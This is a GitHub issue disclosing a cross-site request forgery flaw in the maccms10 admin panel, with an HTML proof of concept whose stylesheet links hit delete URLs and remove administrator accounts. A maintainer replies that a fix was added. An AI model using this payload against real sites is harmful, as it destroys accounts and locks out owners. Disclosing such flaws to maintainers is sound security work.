Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
After the administrator logged in, open the following page.
POC:
<!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <link rel="stylesheet" href="http://127.0.0.1/maccms10/admin.php/admin/admin/del/ids/1.html"> <link rel="stylesheet" href="http://127.0.0.1/maccms10/admin.php/admin/admin/del/ids/2.html"> <link rel="stylesheet" href="http://127.0.0.1/maccms10/admin.php/admin/admin/del/ids/3.html"> </body> </html>
Then administrator users numbered 1, 2, 3 will be deleted.
If the administrators are all deleted, no one can log in.
The text was updated successfully, but these errors were encountered:
已经加入了判断禁止删除当前登录账号。
Sorry, something went wrong.
No branches or pull requests
After the administrator logged in, open the following page.
POC:
Then administrator users numbered 1, 2, 3 will be deleted.
If the administrators are all deleted, no one can log in.
The text was updated successfully, but these errors were encountered: